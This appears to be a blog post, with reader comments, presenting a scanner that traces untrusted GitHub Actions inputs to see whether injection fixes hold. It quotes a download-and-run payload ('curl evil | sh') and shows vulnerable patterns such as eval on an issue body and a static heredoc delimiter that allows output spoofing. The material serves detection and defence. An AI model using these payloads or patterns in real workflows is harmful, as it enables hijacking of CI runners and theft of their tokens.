Every guide to GitHub Actions script injection ends with the same fix. You have this:
- run: helper-cli --prompt "${{ github.event.comment.body }}"
and the runner expands the expression into the script before bash ever sees it, so a comment containing "; curl evil | sh; " runs on your runner with your token. The fix is to move the value into an environment variable:
- env:
BODY: ${{ github.event.comment.body }}
run: helper-cli --prompt "$BODY"
Now bash expands $BODY at runtime, as a value, and the quotes hold. Every scanner that looks for ${{ }} inside run: blocks stops reporting the line. The pull request gets merged with "fixed template injection" in the title.
I spent a day this month verifying one of those fixes by hand, for a finding I had reported and cannot name yet because it is still in coordinated disclosure. The maintainer's fix moved the value into env:, then passed it through with: into a composite action. The scanner was satisfied. I was not, because nothing about the move says what happens to the value next. So I followed it: env: in the workflow, with: into the action, env: again inside the action, a shell script that only delegates, a Node wrapper, and finally a spawn() call with shell: false and the value as one element of an argv array. Seven hops. At the end of hop seven the value is a value and the injection is dead.
It could just as easily have been alive. If the shell script had done eval "$HELPER_PROMPT", or the Node wrapper had done execSync(\helper-cli --prompt ${prompt}), the same fix would have shipped with the same commit title, and the same scanner would have stayed quiet.
That is the gap I wrote taint-trail to close.
What the existing scanner does, and where it stops
If you run one tool on your workflows, run zizmor. It audits for template injection, dangerous triggers, unpinned actions, cache poisoning, permissions and a long list of other things, and it is fast and well maintained. This is not a replacement for it.
zizmor's injection check works on the shape of the text: an untrusted expression inside a script is a finding. That check is exactly right for the "before" of every fix, and it is why the fix everyone applies is "get the expression out of the script". Once the expression is in env:, the shape is gone and the check has nothing to say. It does not follow the variable, because that was never its job.
taint-trail starts where that check ends. It keeps the classic run: check, so the "before" is still caught, and spends the rest of its effort on the "after".
What the after looks like
Same fixture as the real case, with invented names. Before the fix:
$ taint-trail tests/fixtures/workflows/direct_run_injection.yml
github.event.comment.body [untrusted] tests/fixtures/workflows/direct_run_injection.yml / job helper
tests/fixtures/workflows/direct_run_injection.yml:11 run (${{ github.event.comment.body }} interpolated into the script)
SHELL: expression expanded into the shell script before it runs (the classic injection)
The fix that moved the value into env: and then did the one thing you must not do with it:
$ taint-trail tests/fixtures/workflows/moved_not_fixed.yml
github.event.comment.body [untrusted] tests/fixtures/workflows/moved_not_fixed.yml / job helper
tests/fixtures/workflows/moved_not_fixed.yml:12 env BODY
tests/fixtures/workflows/moved_not_fixed.yml:15 run (eval "$BODY")
SHELL: eval re-parses the value as shell
And the fix that actually worked, followed into the action it calls:
$ taint-trail --actions-dir tests/fixtures/actions tests/fixtures/workflows/moved_and_died.yml
github.event.comment.body [untrusted] tests/fixtures/workflows/moved_and_died.yml / job helper
tests/fixtures/workflows/moved_and_died.yml:13 env BODY
tests/fixtures/workflows/moved_and_died.yml:16 with prompt (env.BODY -> example/helper-action@v1)
tests/fixtures/actions/example/helper-action/v1/action.yml:4 inputs.prompt
tests/fixtures/actions/example/helper-action/v1/action.yml:19 env HELPER_PROMPT (inputs.prompt)
tests/fixtures/actions/example/helper-action/v1/action.yml:21 run (bash "$GITHUB_ACTION_PATH/scripts/run-helper.sh")
tests/fixtures/actions/example/helper-action/v1/scripts/run-helper.sh:4 script run-helper.sh (exec node "$DIR/../dist/index.js")
tests/fixtures/actions/example/helper-action/v1/dist/index.js:4 process.env.HELPER_PROMPT
DIES (heuristic): argv array via spawn( at tests/fixtures/actions/example/helper-action/v1/dist/index.js:7; no shell: true, no exec(, no execSync(
Every hop is a file and a line where the value changed hands. That format is not decoration. When I sent the maintainer my verification, what I sent was not "I think it is safe now". It was the list of hops with the line numbers, so they could read each one themselves. A verdict without the chain is an opinion. A verdict with the chain is a reading assignment.
Five endings, and one of them is "I do not know"
A chain ends in one of five ways:
-
SHELL: the value is re-parsed as code. The expression expanded into the script, or the variable reachedeval,bash -c,source,xargs, a pipe intosh, an interpreter's-c/-estring, an interpreter's standard input, or the command position of a line. Exit 1. -
SPOOF: the value is written to$GITHUB_OUTPUTor$GITHUB_ENVin a way that lets it add keys. More on this below. Exit 1. -
SUSPECT (heuristic): a JavaScript action looks like it builds a command string with the value. Pattern match, not parsing, and the output says so. -
DIES: the value ended as a value. Quoted into an argument, echoed, one element of an argv array, written to the output file under a random delimiter. -
UNKNOWN: <reason>: the tool could not follow and refuses to guess.
The last one took the most discipline to keep. The temptation in a tool like this is to make UNKNOWN disappear, because a report full of UNKNOWNs feels like a tool that does not work. But the alternatives are worse. Marking an unreadable action as DIES is a lie that hides an injection; marking it as SHELL is a lie that trains people to ignore the tool. So UNKNOWN is a first-class verdict and the reason is always concrete: the action is not vendored locally, it is a docker action so the arguments reach an entrypoint the tool does not read, the JavaScript matched no pattern, the step's shell is pwsh or python, the heredoc delimiter could not be proven random, the file it would open resolves outside its root.
Take the composite action out of the local directory and the seven-hop chain above becomes:
UNKNOWN: action example/helper-action@v1 not available locally (vendor it under --actions-dir as owner/repo/ref/action.yml, or run with --fetch)
It tells you where it stopped and what would let it continue. That is the whole contract.
The spoof nobody is looking for
The second verdict comes from a pattern that is everywhere in workflows, and no template check will ever flag it, because there is no template in it:
- id: parse
env:
BODY: ${{ github.event.issue.body }}
run: |
{
echo "body<<EOF"
echo "$BODY"
echo "EOF"
} >> "$GITHUB_OUTPUT"
There is no expression in the script. The variable is only echoed. Every template-injection check passes. And an issue whose body contains a line that says EOF closes the heredoc early, so every line after it is parsed by the runner as a new key=value pair. The attacker now sets step outputs that the next step reads as ${{ steps.parse.outputs.anything }}, and if that next step interpolates one of those outputs into a run: block, the next step is the classic injection again, one hop later. The one-line form echo "body=$BODY" >> "$GITHUB_OUTPUT" has the same problem with a plain newline.
$ taint-trail tests/fixtures/workflows/spoof_static_delimiter.yml
github.event.issue.body [untrusted] tests/fixtures/workflows/spoof_static_delimiter.yml / job triage
tests/fixtures/workflows/spoof_static_delimiter.yml:11 env BODY
tests/fixtures/workflows/spoof_static_delimiter.yml:15 run (echo "$BODY")
SPOOF: written to $GITHUB_OUTPUT inside a heredoc block whose delimiter 'EOF' is static; a value containing that line closes the block early and the rest is parsed as new keys
The fix is the one GitHub documents, a delimiter the attacker cannot predict:
delimiter="$(openssl rand -hex 16)"
{
echo "body<<${delimiter}"
echo "$BODY"
echo "${delimiter}"
} >> "$GITHUB_OUTPUT"
which the tool reports as DIES: written to $GITHUB_OUTPUT under a random heredoc delimiter. A delimiter built from $$ or the clock is not proven random, so that one ends as UNKNOWN rather than DIES, on purpose.
Recognising this block turned out to be most of the shell-matching work in the project. Bash lets you write that group forty different ways: one line, opening brace with content on the same line, closing brace on the last body line, nested in a subshell, after &&, inside an if, inside a for whose done carries the redirect, closing with a \ continuation. The test suite has 42 fixture layouts of the group and each one has to end in SPOOF. I found most of them the hard way, by attacking the matcher after each round and adding the shape that got through.
Outputs are tainted as a set, on purpose
There is one place where the tool deliberately over-reports, and I want to be explicit about it because it is a design choice, not a bug.
When a step has a tainted variable in its environment and its script writes to $GITHUB_OUTPUT, the tool taints every output of that step. It does not try to prove which keys the script wrote. Same for a JavaScript action that received a tainted input: every output it declares is tainted, and so is every output it did not declare, because core.setOutput can set a name the manifest never mentions.
Proving which output got the value would need a real dataflow analysis of bash and JavaScript, and a wrong answer there would be silent. Over-approximating means a few more chains to read and zero chains that were hidden. The hop says over-approximation so nobody mistakes it for a proof.
What it does not do
The README has a section called "Limits, stated plainly" and I will repeat the important ones here, because a security tool that does not state its limits is asking you to trust it, and I would rather you read it.
Bash is matched by pattern, not parsed. bash -c 'tool "$1"' _ "$VAR" is a safe idiom and the tool reports it as SHELL anyway, because it sees bash -c and the variable on the same line. Read the line the chain points at.
JavaScript is a heuristic, and every verdict from it carries the word. There is no dataflow analysis. A bundled action whose getInput('x') string survived bundling is matched; one that renamed it is UNKNOWN.
Docker actions are opaque. Reusable workflows are followed one level. Secrets are trusted by definition. The only untrusted source is a ${{ }} expression, so a value read inside github-script through context.payload starts no chain.
And a handful of shell shapes are simply not matched: command substitution in command position, set -- $V followed by "$@", awk with system(), eval reached through a variable. Every one of these has a fixture in the repository named gap_*.yml that pins the current behaviour, one fixture per line in that README section, and the suite pins the count. Adding a pattern means deleting a fixture and its line. That rule is what let me stop: the README promises exactly what the code does, no more.
Running it
pip install .
taint-trail .github/workflows
taint-trail .github/workflows --actions-dir ./vendored-actions --strict --json
One runtime dependency, PyYAML. No network unless you pass --fetch, which shallow-clones every missing owner/repo@ref into the actions directory once and then scans. Every file the tool opens is checked against a root after resolving symlinks, and the tests create real symlinks pointing outside to assert that the content never shows up in a hop. The CI runs the tool on its own workflows with --strict, then on two fixtures it must flag, asserting exit 1 with SHELL and SPOOF in the output. The second step is the one that matters: the first alone would pass for a tool that finds nothing.
If your fix for an injection was "move it into env", this tells you whether the job is now safe or just quieter.

Top comments (9)
The line I will be quoting from this is UNKNOWN as a first-class verdict, and your reason for keeping it: marking an unreadable action as DIES is a lie that hides an injection, and marking it SHELL is a lie that trains people to ignore the tool.
I paid for the first of those last week, in a domain nowhere near yours. I have a harness that measures whether our retrieval finds the right document. It shells out to a search tool and reads stdout. In one sandbox that tool died at startup with exit 2, the harness read only stdout, and every task therefore scored a clean miss. The table came out 0 of 14 at every depth, and the summary printed a verdict off the back of it: the first stage is the problem, reranking is the wrong project. Zero successful searches. Exit code 0.
A retriever that finds nothing and a retriever that could not run produce an identical table. What made it dangerous was the direction: the false answer was the more interesting one, so it was the one I was primed to believe. An instrument whose failure mode manufactures your headline gets believed on exactly the day you can least afford it.
The repair was yours, reached the slow way. Raise on a nonzero exit, raise when a parse yields nothing from a call that exited 0, and withhold the whole table instead of printing a partial one. UNKNOWN earning its own row.
The other half I would underline is that you attacked your own matcher after each round and added whatever shape got through. We have that written down as a rule and I still discovered we were not really doing it. A gate that checks the numbers in our published copy prints OK at every boot, so I fed it seven deliberate defects, five wrong percentages and two claims we had already retracted. It caught zero of the seven. It turns out to be a value whitelist with a tolerance wide enough to cover most of the range, and the green line is precisely what kept anyone from re-reading the caveat. A guard nobody has watched fail is a habit.
Tainting every output of the step as a set, and printing the word over-approximation next to it, is the same discipline pointed the other way. More chains to read, none hidden, and no reader can mistake it for a proof.
Tom — the retrieval harness story is the same shape as the reply-verifier example you gave me on the Nabsun thread: it asked the API about the comment ID it had aimed at and reported zero of twelve posted when three had landed. Same root cause as your exit-2 case — the check trusted the surface closest to the thing it was checking, instead of an independent source of truth, and a total instrument failure rendered as a clean, confident result in the same shape as a real one.
The whitelist-with-too-much-tolerance case is the sharper one though, because that's not an instrument dying, it's an instrument succeeding at the wrong spec. It ran, returned an answer, and the answer was wrong in a way indistinguishable from "correct" unless you already knew to attack it. UNKNOWN-as-a-verdict works against silence. It doesn't touch a gate that's confidently, quietly checking the wrong thing. That one you only find by doing exactly what you did: feeding it defects you already know the right answer to, on a schedule, not waiting for it to fail on its own.
Agreed, and that distinction is the useful one. UNKNOWN defends against an instrument that goes quiet. It does nothing for one that is confident and wrong.
We hit the second kind again this week. A guard that blocks searches through our notes turned out to be wrong 54 times out of 84 once we labelled every block by hand. It had been green the whole time, because nothing had ever compared its blocks against a known right answer. The fix was the move you describe: a fixed set of cases whose answers we already knew, including shapes it was never written for, run against it and kept as a fixture so they keep getting run.
The part I would add is the schedule. Every fix we make now gets a date on which it is measured again, because a check that passed once is only evidence about the day it passed.
Tom, the exit-2 story is the one I'd pin on the wall, mostly because of the direction you named: the broken instrument produced the more interesting answer. A dead tool that reads as "nothing found" wins every argument it's in.
One nuance I hit while building this. taint-trail skips a file it can't parse, says so on stderr, and still exits on the verdicts of the files it did read. That's fine there because each verdict is per file, so a skipped file can't change what another file's chain says. Your table is an aggregate. "0 of 14" quietly counts the tasks that never ran in the denominator, which is exactly why withholding the whole table is right, and not just caution.
On the confident-and-wrong gate you and Naveen got into: the other direction helps too. taint-trail pins what it knows it misses. Every gap listed in the README has a fixture asserting the tool does not flag it, and the suite counts them, so teaching it a new shape forces the README line out. Your seeded defects pin what a gate must catch; pinned gaps stop the docs from claiming more than the code does. A limitation nobody pinned tends to turn into a claim.
Pinned gaps is the part I would take. A fixture asserts that each known blind spot stays blind, so the README and the code are held to the same list, and teaching the tool a new shape breaks the pin and forces the README line out. We did a small version of it today by accident. A benchmark we use has one task whose own reference answer fails its own checker, so we exclude that task by name, and the test for the exclusion re-runs the reference and asserts it still fails. If the benchmark fixes it upstream, the test goes red and the exclusion has to come out. Without that, the exclusion would have outlived the reason for it.
That's a better version than mine, because the reason gets re-checked instead of just remembered. An exclusion is a claim with an expiry date nobody wrote down.
For what it's worth, pytest has this built in:
@pytest.mark.xfail(strict=True)turns an expected failure red the moment it starts passing. Linters do the same for suppressions: mypy'swarn_unused_ignoresand ruff's RUF100 flag atype: ignoreornoqathat no longer suppresses anything. Each of those is a small exclusion that outlives its reason unless something checks it.Thank you for these. I didn't know about RUF100, and xfail(strict=True) is exactly the shape of our test: an expected failure that turns red the day it starts passing.
Ours has to be hand-rolled for one reason. The exclusion is about someone else's answer, the benchmark's reference solution, so the test re-runs their answer through their checker. If the maintainers fix it upstream, we find out on our next run instead of whenever someone rereads the exclusion list.
(Same person as the comment above. I usually post from this account.)
Makes sense, and it's the post's idea from another angle: the exclusion is a decision whose premise lives in someone else's repo, so you re-check the premise on every run instead of trusting the list that recorded it. Thanks for writing all of this up.
Yes, the premise lives upstream, so the check has to go and look there. Thanks for the pytest and ruff pointers, and for reading this closely.